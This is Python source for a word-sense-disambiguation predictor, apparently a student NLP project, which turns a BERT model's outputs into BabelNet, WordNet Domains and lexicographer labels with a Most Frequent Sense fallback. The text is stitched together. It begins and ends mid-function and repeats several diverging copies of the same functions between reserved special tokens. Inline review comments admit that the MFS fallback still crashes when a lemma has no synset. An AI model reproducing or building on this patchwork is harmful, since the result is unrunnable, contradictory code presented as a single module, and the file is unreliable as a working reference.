        # Fine-grained: the BabelNet id itself is the answer.
        return meaning
    if pred_case == 2:
        # WordNet Domains: unmapped ids fall back to the empty class.
        mapped = vocab.get(meaning)
        if mapped:
            return mapped[0]
        return 'factotum'
    if pred_case == 3:
        # Lexicographer: every id is expected to have a mapping.
        return vocab.get(meaning)[0]
def __type_checker(value: object) ->str:
    """
    Normalizes *value* to a plain string: a list is represented by its first
    element, a string passes through unchanged.

    :param value: the value to examine
    :return: the string form of *value* (implicitly None for any other type)
    """
    kind = type(value)
    if kind == str:
        return value
    if kind == list:
        return value[0]
<|reserved_special_token_0|>
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:
    """
    Cast the given list (which contains only WN ids) to Babelnet IDs.

    WN ids that have no entry in *vocab* are skipped: the original call to
    `next(...)` had no default and raised StopIteration for them, which made
    the `if is_it_here:` guard unreachable and crashed the prediction.

    :param list_of_bn: the list of WordNet ids to cast
    :param vocab: mapping BabelNet id -> WordNet id(s) used for the reverse lookup
    :return: the converted list
    """
    list_of_possible_senses_bn_version = []
    for candidate in list_of_bn:
        # Reverse lookup: first BabelNet key whose value(s) contain this WN id;
        # None (instead of StopIteration) when the candidate is unmapped.
        is_it_here = next((key for key, value in vocab.items() if candidate in
            value), None)
        if is_it_here:
            list_of_possible_senses_bn_version.append(is_it_here if type(
                is_it_here) == str else is_it_here[0])
    return list_of_possible_senses_bn_version
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
    ) ->None:
    """
    DO NOT MODIFY THE SIGNATURE!
    This is the skeleton of the prediction function.
    The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
    with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
    The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
    N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
    If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
    :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
    :param output_path: the path of the output file (where you save your predictions)
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :return: None
    """
    # NOTE(review): the docstring is now the first statement of the function.
    # It previously followed `global mfs_counter`, so it was a discarded string
    # expression and never became __doc__ (siblings already had it first).
    global mfs_counter
    print('>>>> BABELNET PREDICTION')
    prediction_results, sentences_xml_elements = __predict(input_path,
        resources_path)
    # Label vocabulary used to turn network outputs into BabelNet ids.
    vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
    correctly_saved = 0
    filename = os.path.normpath(input_path)
    filename = filename.split(os.sep)[-1]
    # Replace the "xml" extension with the gold-key suffix.
    filename = filename[:-3] + 'babelnet.gold.key.txt'
    for index in range(len(prediction_results)):
        # prediction_results[index][0] holds the BabelNet output layer.
        correctly_saved += __write_result(filename, sentences_xml_elements[
            index], resources_path, output_path, prediction_results[index][
            0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
            vocab_for_coarse=None)
    print('Successfully saved {} out of {}'.format(correctly_saved, len(
        prediction_results)))
    del prediction_results
    print('Of these, {} were MFS'.format(mfs_counter))
    mfs_counter = 0
    return
def predict_wordnet_domains(input_path: str, output_path: str,
    resources_path: str) ->None:
    """
    Predicts WordNet Domains (e.g. "sport") labels for every instance of the
    input corpus and appends "<id> <wordnetDomain>" lines to the output file.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param output_path: directory where the prediction file is written
    :param resources_path: path of the resources folder (model, vocabularies, mappings)
    :return: None
    """
    global mfs_counter
    print('>>>> WORDNET DOMAINS PREDICTION')
    prediction_results, sentences_xml_elements = __predict(input_path,
        resources_path)
    # Serialized label vocabulary and BabelNet -> WordNet Domains mapping used
    # for the coarse-grained conversion.
    vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    bn2wndom = get_bn2wndomains()
    # Derive the gold-key file name from the input file name ("xml" dropped).
    base_name = os.path.basename(os.path.normpath(input_path))
    filename = base_name[:-3] + 'wndomains.gold.key.txt'
    correctly_saved = 0
    for index, sentence_prediction in enumerate(prediction_results):
        # sentence_prediction[1] holds the WordNet Domains output layer.
        correctly_saved += __write_result(filename, sentences_xml_elements[
            index], resources_path, output_path, sentence_prediction[1][0],
            vocab=vocab_label_wndmn, enable_coarse_grained=2,
            vocab_for_coarse=bn2wndom)
    print('Successfully saved {} out of {}'.format(correctly_saved, len(
        prediction_results)))
    del prediction_results
    print('Of these, {} were MFS'.format(mfs_counter))
    mfs_counter = 0
    return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
    str) ->None:
    """
    Predicts lexicographer (e.g. "noun.animal") labels for every instance of the
    input corpus and appends "<id> <lexicographerId>" lines to the output file.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param output_path: directory where the prediction file is written
    :param resources_path: path of the resources folder (model, vocabularies, mappings)
    :return: None
    """
    global mfs_counter
    print('>>>> LEXICOGRAPHER PREDICTION')
    prediction_results, sentences_xml_elements = __predict(input_path,
        resources_path)
    # Serialized label vocabulary and BabelNet -> lexname mapping used for the
    # coarse-grained conversion.
    vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
    bn2lex = get_bn2lex()
    # Derive the gold-key file name from the input file name ("xml" dropped).
    base_name = os.path.basename(os.path.normpath(input_path))
    filename = base_name[:-3] + 'lexicon.gold.key.txt'
    correctly_saved = 0
    for index, sentence_prediction in enumerate(prediction_results):
        # sentence_prediction[2] holds the lexicographer output layer.
        correctly_saved += __write_result(filename, sentences_xml_elements[
            index], resources_path, output_path, sentence_prediction[2][0],
            vocab=vocab_label_lex, enable_coarse_grained=3,
            vocab_for_coarse=bn2lex)
    print('Successfully saved {} out of {}'.format(correctly_saved, len(
        prediction_results)))
    del prediction_results
    print('Of these, {} were MFS'.format(mfs_counter))
    mfs_counter = 0
    return
def __predict(input_path: str, resources_path: str) ->Tuple:
    """
    Runs the trained WSD network over every sentence of the input corpus.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param resources_path: path of the resources folder (model weights, vocabularies)
    :return: a tuple (per-sentence network outputs, XML sentence elements)
    """
    sentences, xml_tree = load_dataset(input_path)
    sentences = [sentence for sentence in sentences if sentence]
    # The three output layers are sized after the three label vocabularies.
    vocab_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    vocab_bn = create_mapping_dictionary(resources_path, mode='bn')
    vocab_lex = create_mapping_dictionary(resources_path, mode='lex')
    network = WSD(resources_path + '/vocabularies/bert_vocab.txt',
        [len(vocab_bn), len(vocab_wndmn), len(vocab_lex)],
        dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)
    tokenizer = network.tokenizatore
    network.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5')
    predictions = []
    sentences_xml_elements = xml_tree.xpath('/*/*/*')
    for sentence in sentences:
        word_ids, mask, segments = convert_sentence_to_features_no_padding(
            sentence, tokenizer)
        predictions.append(network.model.predict({'input_word_ids':
            word_ids, 'input_mask': mask, 'segment_ids': segments}, verbose=1))
    del vocab_lex
    del vocab_wndmn
    del vocab_bn
    return predictions, sentences_xml_elements
def __write_result(filename: str, frase, resources_path: str, outputh_path:
    str, predictions, vocab=None, enable_coarse_grained: int=1,
    vocab_for_coarse=None) ->int:
    """
    Write results in the file system
    :param filename: the name of the file to save
    :param frase: the object from which recover the sentence
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :param output_path: the path of the output file (where you save your predictions)
    :param predictions: the predictions made by the system
    :param vocab: the vocab needed for giving a sense
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :param vocab_for_coarse: The vocab in support of mode 2 or 3
    :return: 1 if succeeds
    """
    global mfs_counter
    # Static mappings: BabelNet id -> WordNet id(s), and lemma -> candidate WN ids.
    bn2wn = get_bn2wn()
    lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
    to_write = []
    for index, parola in enumerate(frase):
        name = parola.xpath('name()')
        # Only <instance> elements need disambiguation; other tokens are skipped.
        if name == 'instance':
            id = parola.get('id')
            list_of_possible_senses_first_step = lemma2wn.get(parola.text)
            if not list_of_possible_senses_first_step:
                # Lemma unknown to the mapping: fall back to Most Frequent Sense.
                the_actual_meaning = MFS(parola, bn2wn, vocab2=
                    vocab_for_coarse, pred_case=enable_coarse_grained)
                mfs_counter += 1
                to_write.append((id, the_actual_meaning))
                continue
            # Restrict the network's scores to this lemma's candidate senses.
            list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
                list_of_possible_senses_first_step, bn2wn)
            candidates, list_of_possible_senses_bn_version = (
                create_custom_label(list_of_possible_senses_bn_version,
                parola.text, vocab, predictions[index],
                enable_coarse_grained=enable_coarse_grained))
            the_actual_meaning = None
            if candidates:
                # Pick the candidate sense the network scored highest.
                argmax = np.argmax(candidates)
                the_actual_meaning = list_of_possible_senses_bn_version[argmax]
            else:
                # No candidate survived the vocabulary lookup: MFS fallback.
                mfs_counter += 1
                the_actual_meaning = MFS(parola, bn2wn, vocab2=
                    vocab_for_coarse, pred_case=enable_coarse_grained)
            to_write.append((id, the_actual_meaning))
    # Append mode: predictions of successive sentences accumulate in one file.
    with open(outputh_path + '/' + filename, 'a') as test_saving:
        for tupla in to_write:
            test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
    del to_write
    del lemma2wn
    del bn2wn
    return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
    """
    Returns the sense by applying the Most Frequent Sense (MFS) strategy
    :param parola: the Element object to which associate a sense
    :param vocab: the vocab needed for giving a sense
    :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
    :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :return: the chosen sense with the MFS technique
    """
    pos = parola.get('pos')
    pos_input = __decide_pos(pos)
    # WordNet lists synsets by decreasing frequency, so the first entry is the MFS.
    wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
    try:
        wordnet_object = wordnet_object[0]
    except IndexError:
        # No synset for this lemma/pos pair: log it. NOTE(review): execution
        # still falls through and the .offset() call below fails on the empty
        # list; the original bare `except:` behaved the same way but also
        # swallowed SystemExit/KeyboardInterrupt, so it was narrowed here.
        print(wordnet_object)
        print(parola.text)
    # Build the "wn:<zero-padded offset><pos>" key and reverse-map it to its
    # BabelNet id (next() raises StopIteration if the synset is not in vocab).
    wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
        ) + wordnet_object.pos()
    the_actual_meaning = next(key for key, value in vocab.items() if
        wn_synset in value)
    to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
        vocab2, pred_case=pred_case)
    return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
    Dict=None) ->str:
    """
    Normalizes a BabelNet id found by MFS and, depending on the prediction
    mode, maps it through the coarse-grained vocabulary.

    :param value: either a BabelNet id string or a list whose first element is one
    :param pred_case: 1 -> BabelNet (the id is returned as is);
                      2 -> WordNet Domains ('factotum' when no mapping exists);
                      3 -> Lexicographer (a mapping is assumed to exist)
    :param vocab: the coarse-grained mapping used for modes 2 and 3
    :return: the extracted/converted meaning
    """
    meaning = __type_checker(value)
    if pred_case == 1:
        # Fine-grained: the BabelNet id itself is the answer.
        return meaning
    if pred_case == 2:
        # WordNet Domains: unmapped ids fall back to the empty class.
        mapped = vocab.get(meaning)
        if mapped:
            return mapped[0]
        return 'factotum'
    if pred_case == 3:
        # Lexicographer: every id is expected to have a mapping.
        return vocab.get(meaning)[0]
def __type_checker(value: object) ->str:
    """
    Normalizes *value* to a plain string: a list is represented by its first
    element, a string passes through unchanged.

    :param value: the value to examine
    :return: the string form of *value* (implicitly None for any other type)
    """
    kind = type(value)
    if kind == str:
        return value
    if kind == list:
        return value[0]
def __decide_pos(pos: str) ->str:
    """
    Maps a corpus POS tag onto the single-letter WordNet POS tag.

    :param pos: the corpus POS tag ('NOUN', 'VERB', 'ADJ' or 'ADV')
    :return: the WordNet tag, or None for any other input
    """
    wn_tags = {'NOUN': 'n', 'VERB': 'v', 'ADJ': 'a', 'ADV': 'r'}
    return wn_tags.get(pos)
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:
    """
    Cast the given list (which contains only WN ids) to Babelnet IDs.

    WN ids that have no entry in *vocab* are skipped: the original call to
    `next(...)` had no default and raised StopIteration for them, which made
    the `if is_it_here:` guard unreachable and crashed the prediction.

    :param list_of_bn: the list of WordNet ids to cast
    :param vocab: mapping BabelNet id -> WordNet id(s) used for the reverse lookup
    :return: the converted list
    """
    list_of_possible_senses_bn_version = []
    for candidate in list_of_bn:
        # Reverse lookup: first BabelNet key whose value(s) contain this WN id;
        # None (instead of StopIteration) when the candidate is unmapped.
        is_it_here = next((key for key, value in vocab.items() if candidate in
            value), None)
        if is_it_here:
            list_of_possible_senses_bn_version.append(is_it_here if type(
                is_it_here) == str else is_it_here[0])
    return list_of_possible_senses_bn_version
def create_custom_label(list_of_possible_senses: List, word: str, vocab:
    Dict, predictions, enable_coarse_grained: int=1) ->Tuple:
    """
    Converts the list of babelnet IDS to a number and outputs the converted list

    :param list_of_possible_senses: the list that contains all the babelnet's IDs
    :param word: the word for which we are predicting the sense in a specific moment
    :param vocab: the vocabulary Word -> Serial to exploit for the conversion
    :param predictions: the predictions made by the system
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:
    1 --> The flow will still be the same
    2,3 -> Flow will change, triggering the first step for the coarse-grained approach.
    :return: a tuple (scores of the surviving candidates, candidates that had a vocab entry)
    """
    to_return = []
    list_of_indices_to_delete = []
    for indice in range(len(list_of_possible_senses)):
        # Fine-grained keys are "<word>_<bn id>"; coarse-grained keys are the id itself.
        new_string = word + '_' + list_of_possible_senses[indice
            ] if enable_coarse_grained == 1 else list_of_possible_senses[indice
            ]
        try:
            conversion = int(vocab[new_string])
            to_return.append(predictions[conversion])
        except (KeyError, ValueError, TypeError, IndexError):
            # Unknown label, malformed serial or out-of-range index: drop the
            # candidate. (The original bare `except:` also swallowed
            # SystemExit/KeyboardInterrupt, so it was narrowed here.)
            list_of_indices_to_delete.append(indice)
            continue
    if list_of_indices_to_delete:
        list_of_possible_senses = [list_of_possible_senses[prov_index] for
            prov_index in range(len(list_of_possible_senses)) if prov_index
            not in list_of_indices_to_delete]
    return to_return, list_of_possible_senses
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
    ) ->None:
    """
    DO NOT MODIFY THE SIGNATURE!
    This is the skeleton of the prediction function.
    The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
    with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
    The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
    N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
    If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
    :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
    :param output_path: the path of the output file (where you save your predictions)
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :return: None
    """
    # NOTE(review): the docstring is now the first statement of the function.
    # It previously followed `global mfs_counter`, so it was a discarded string
    # expression and never became __doc__ (siblings already had it first).
    global mfs_counter
    print('>>>> BABELNET PREDICTION')
    prediction_results, sentences_xml_elements = __predict(input_path,
        resources_path)
    # Label vocabulary used to turn network outputs into BabelNet ids.
    vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
    correctly_saved = 0
    filename = os.path.normpath(input_path)
    filename = filename.split(os.sep)[-1]
    # Replace the "xml" extension with the gold-key suffix.
    filename = filename[:-3] + 'babelnet.gold.key.txt'
    for index in range(len(prediction_results)):
        # prediction_results[index][0] holds the BabelNet output layer.
        correctly_saved += __write_result(filename, sentences_xml_elements[
            index], resources_path, output_path, prediction_results[index][
            0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
            vocab_for_coarse=None)
    print('Successfully saved {} out of {}'.format(correctly_saved, len(
        prediction_results)))
    del prediction_results
    print('Of these, {} were MFS'.format(mfs_counter))
    mfs_counter = 0
    return
def predict_wordnet_domains(input_path: str, output_path: str,
    resources_path: str) ->None:
    """
    Predicts WordNet Domains (e.g. "sport") labels for every instance of the
    input corpus and appends "<id> <wordnetDomain>" lines to the output file.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param output_path: directory where the prediction file is written
    :param resources_path: path of the resources folder (model, vocabularies, mappings)
    :return: None
    """
    global mfs_counter
    print('>>>> WORDNET DOMAINS PREDICTION')
    prediction_results, sentences_xml_elements = __predict(input_path,
        resources_path)
    # Serialized label vocabulary and BabelNet -> WordNet Domains mapping used
    # for the coarse-grained conversion.
    vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    bn2wndom = get_bn2wndomains()
    # Derive the gold-key file name from the input file name ("xml" dropped).
    base_name = os.path.basename(os.path.normpath(input_path))
    filename = base_name[:-3] + 'wndomains.gold.key.txt'
    correctly_saved = 0
    for index, sentence_prediction in enumerate(prediction_results):
        # sentence_prediction[1] holds the WordNet Domains output layer.
        correctly_saved += __write_result(filename, sentences_xml_elements[
            index], resources_path, output_path, sentence_prediction[1][0],
            vocab=vocab_label_wndmn, enable_coarse_grained=2,
            vocab_for_coarse=bn2wndom)
    print('Successfully saved {} out of {}'.format(correctly_saved, len(
        prediction_results)))
    del prediction_results
    print('Of these, {} were MFS'.format(mfs_counter))
    mfs_counter = 0
    return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
    str) ->None:
    """
    Predicts lexicographer (e.g. "noun.animal") labels for every instance of the
    input corpus and appends "<id> <lexicographerId>" lines to the output file.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param output_path: directory where the prediction file is written
    :param resources_path: path of the resources folder (model, vocabularies, mappings)
    :return: None
    """
    global mfs_counter
    print('>>>> LEXICOGRAPHER PREDICTION')
    prediction_results, sentences_xml_elements = __predict(input_path,
        resources_path)
    # Serialized label vocabulary and BabelNet -> lexname mapping used for the
    # coarse-grained conversion.
    vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
    bn2lex = get_bn2lex()
    # Derive the gold-key file name from the input file name ("xml" dropped).
    base_name = os.path.basename(os.path.normpath(input_path))
    filename = base_name[:-3] + 'lexicon.gold.key.txt'
    correctly_saved = 0
    for index, sentence_prediction in enumerate(prediction_results):
        # sentence_prediction[2] holds the lexicographer output layer.
        correctly_saved += __write_result(filename, sentences_xml_elements[
            index], resources_path, output_path, sentence_prediction[2][0],
            vocab=vocab_label_lex, enable_coarse_grained=3,
            vocab_for_coarse=bn2lex)
    print('Successfully saved {} out of {}'.format(correctly_saved, len(
        prediction_results)))
    del prediction_results
    print('Of these, {} were MFS'.format(mfs_counter))
    mfs_counter = 0
    return
def __predict(input_path: str, resources_path: str) ->Tuple:
    """
    Runs the trained WSD network over every sentence of the input corpus.

    :param input_path: path of the XML input file (Raganato's framework format)
    :param resources_path: path of the resources folder (model weights, vocabularies)
    :return: a tuple (per-sentence network outputs, XML sentence elements)
    """
    sentences, xml_tree = load_dataset(input_path)
    sentences = [sentence for sentence in sentences if sentence]
    # The three output layers are sized after the three label vocabularies.
    vocab_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    vocab_bn = create_mapping_dictionary(resources_path, mode='bn')
    vocab_lex = create_mapping_dictionary(resources_path, mode='lex')
    network = WSD(resources_path + '/vocabularies/bert_vocab.txt',
        [len(vocab_bn), len(vocab_wndmn), len(vocab_lex)],
        dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)
    tokenizer = network.tokenizatore
    network.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5')
    predictions = []
    sentences_xml_elements = xml_tree.xpath('/*/*/*')
    for sentence in sentences:
        word_ids, mask, segments = convert_sentence_to_features_no_padding(
            sentence, tokenizer)
        predictions.append(network.model.predict({'input_word_ids':
            word_ids, 'input_mask': mask, 'segment_ids': segments}, verbose=1))
    del vocab_lex
    del vocab_wndmn
    del vocab_bn
    return predictions, sentences_xml_elements
def __write_result(filename: str, frase, resources_path: str, outputh_path:
    str, predictions, vocab=None, enable_coarse_grained: int=1,
    vocab_for_coarse=None) ->int:
    """
    Write results in the file system
    :param filename: the name of the file to save
    :param frase: the object from which recover the sentence
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :param output_path: the path of the output file (where you save your predictions)
    :param predictions: the predictions made by the system
    :param vocab: the vocab needed for giving a sense
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :param vocab_for_coarse: The vocab in support of mode 2 or 3
    :return: 1 if succeeds
    """
    global mfs_counter
    # Static mappings: BabelNet id -> WordNet id(s), and lemma -> candidate WN ids.
    bn2wn = get_bn2wn()
    lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
    to_write = []
    for index, parola in enumerate(frase):
        name = parola.xpath('name()')
        # Only <instance> elements need disambiguation; other tokens are skipped.
        if name == 'instance':
            id = parola.get('id')
            list_of_possible_senses_first_step = lemma2wn.get(parola.text)
            if not list_of_possible_senses_first_step:
                # Lemma unknown to the mapping: fall back to Most Frequent Sense.
                the_actual_meaning = MFS(parola, bn2wn, vocab2=
                    vocab_for_coarse, pred_case=enable_coarse_grained)
                mfs_counter += 1
                to_write.append((id, the_actual_meaning))
                continue
            # Restrict the network's scores to this lemma's candidate senses.
            list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
                list_of_possible_senses_first_step, bn2wn)
            candidates, list_of_possible_senses_bn_version = (
                create_custom_label(list_of_possible_senses_bn_version,
                parola.text, vocab, predictions[index],
                enable_coarse_grained=enable_coarse_grained))
            the_actual_meaning = None
            if candidates:
                # Pick the candidate sense the network scored highest.
                argmax = np.argmax(candidates)
                the_actual_meaning = list_of_possible_senses_bn_version[argmax]
            else:
                # No candidate survived the vocabulary lookup: MFS fallback.
                mfs_counter += 1
                the_actual_meaning = MFS(parola, bn2wn, vocab2=
                    vocab_for_coarse, pred_case=enable_coarse_grained)
            to_write.append((id, the_actual_meaning))
    # Append mode: predictions of successive sentences accumulate in one file.
    with open(outputh_path + '/' + filename, 'a') as test_saving:
        for tupla in to_write:
            test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
    del to_write
    del lemma2wn
    del bn2wn
    return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
    """
    Returns the sense by applying the Most Frequent Sense (MFS) strategy
    :param parola: the Element object to which associate a sense
    :param vocab: the vocab needed for giving a sense
    :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
    :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :return: the chosen sense with the MFS technique
    """
    pos = parola.get('pos')
    pos_input = __decide_pos(pos)
    # All WordNet synsets for the lemma, restricted to the mapped POS; the
    # first entry is WordNet's most frequent sense.
    wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
    try:
        wordnet_object = wordnet_object[0]
    except:
        # NOTE(review): on an empty synset list this only prints diagnostics;
        # execution falls through and the .offset() call below raises
        # AttributeError on the (still empty) list.
        print(wordnet_object)
        print(parola.text)
    # Canonical WordNet id, e.g. 'wn:00001740n' (zero-padded offset + POS letter).
    wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
        ) + wordnet_object.pos()
    # Reverse lookup: the Babelnet id whose mapped WN ids contain wn_synset.
    # NOTE(review): next() without a default raises StopIteration on a miss.
    the_actual_meaning = next(key for key, value in vocab.items() if
        wn_synset in value)
    to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
        vocab2, pred_case=pred_case)
    return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
    Dict=None) ->str:
    """
    Resolve a raw MFS lookup result (a string or a list) into the final
    prediction string for the requested task.

    :param value: the Babelnet id(s) found by the MFS lookup
    :param pred_case: prediction mode:
        1 --> Babelnet: the id is returned as-is
        2 --> WordNet Domains: looked up in vocab; 'factotum' on a miss
        3 --> Lexicographer: looked up in vocab
    :param vocab: the coarse-grained mapping consulted for modes 2 and 3
    :return: the meaning to write out
    """
    meaning = __type_checker(value)
    if pred_case == 1:
        return meaning
    if pred_case == 2:
        domains = vocab.get(meaning)
        return domains[0] if domains else 'factotum'
    if pred_case == 3:
        return vocab.get(meaning)[0]
def __type_checker(value: object) ->str:
    """
    Normalise *value* to a plain string: a str passes through unchanged, a
    list yields its first element, and anything else yields None.

    :param value: the object to normalise
    :return: the extracted string (or None for unsupported types)
    """
    kind = type(value)
    if kind == str:
        return value
    return value[0] if kind == list else None
def __decide_pos(pos: str) ->str:
    """
    Map a coarse POS tag to its single-letter WordNet code.

    :param pos: the coarse tag ('NOUN', 'VERB', 'ADJ' or 'ADV')
    :return: 'n', 'v', 'a' or 'r' respectively; None for any other tag
    """
    wn_codes = {'NOUN': 'n', 'VERB': 'v', 'ADJ': 'a', 'ADV': 'r'}
    return wn_codes.get(pos)
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:
    """
    Cast the given list (which contains only WN ids) to Babelnet IDs.

    :param list_of_bn: the list of WordNet ids to cast
    :param vocab: mapping Babelnet id -> WordNet id(s) used for the conversion
    :return: the converted list; ids with no match in vocab are skipped
    """
    list_of_possible_senses_bn_version = []
    for candidate in list_of_bn:
        # Bugfix: next() now has a None default. The original had no default,
        # so an unmatched candidate raised StopIteration instead of reaching
        # the falsy check below that was clearly meant to skip it.
        is_it_here = next((key for key, value in vocab.items() if candidate in
            value), None)
        if is_it_here:
            list_of_possible_senses_bn_version.append(is_it_here if type(
                is_it_here) == str else is_it_here[0])
    return list_of_possible_senses_bn_version
def create_custom_label(list_of_possible_senses: List, word: str, vocab:
    Dict, predictions, enable_coarse_grained: int=1) ->List:
    """
    Converts the list of babelnet IDs to prediction scores and outputs both
    the scores and the senses that survived the conversion.

    :param list_of_possible_senses: the list that contains all the babelnet's IDs
    :param word: the word for which we are predicting the sense in a specific moment
    :param vocab: the vocabulary Word -> Serial to exploit for the conversion
    :param predictions: the predictions made by the system
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Possible values:
    1 --> vocab is keyed on '<word>_<sense>'
    2,3 --> vocab is keyed on the sense alone (coarse-grained)
    :return: a tuple (scores, kept senses), index-aligned with each other
    """
    scores = []
    kept_senses = []
    for sense in list_of_possible_senses:
        # Fine-grained vocab keys are '<word>_<babelnet id>'; coarse-grained
        # keys are the bare sense id.
        key = word + '_' + sense if enable_coarse_grained == 1 else sense
        try:
            serial = int(vocab[key])
            scores.append(predictions[serial])
        except (KeyError, ValueError, TypeError, IndexError):
            # Bugfix: narrowed from a bare 'except:' which also swallowed
            # KeyboardInterrupt/SystemExit. Unknown or malformed keys are
            # simply dropped, as before.
            continue
        kept_senses.append(sense)
    return scores, kept_senses
if __name__ == '__main__':
    # NOTE(review): hard-coded absolute paths from the author's machine —
    # replace with CLI arguments before running elsewhere.
    predict_babelnet(
        '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml'
        , '../output',
        '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources'
        )
<|reserved_special_token_1|>
from model import WSD
from data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex
from typing import List, Dict, Tuple
from prova import convert_sentence_to_features_no_padding
import numpy as np
import os
from nltk.corpus import wordnet
mfs_counter = 0
def predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None:
    """
    DO NOT MODIFY THE SIGNATURE!
    This is the skeleton of the prediction function.
    The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
    with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").

    The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.

    N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
    If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding

    :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
    :param output_path: the path of the output file (where you save your predictions)
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :return: None
    """
    # Bugfix: 'global mfs_counter' used to precede the docstring, which made
    # the string a plain no-op expression instead of the function's __doc__.
    # Declaring the global here (before any use) is behaviorally equivalent.
    global mfs_counter
    print(">>>> BABELNET PREDICTION")
    prediction_results, sentences_xml_elements = __predict(input_path, resources_path)
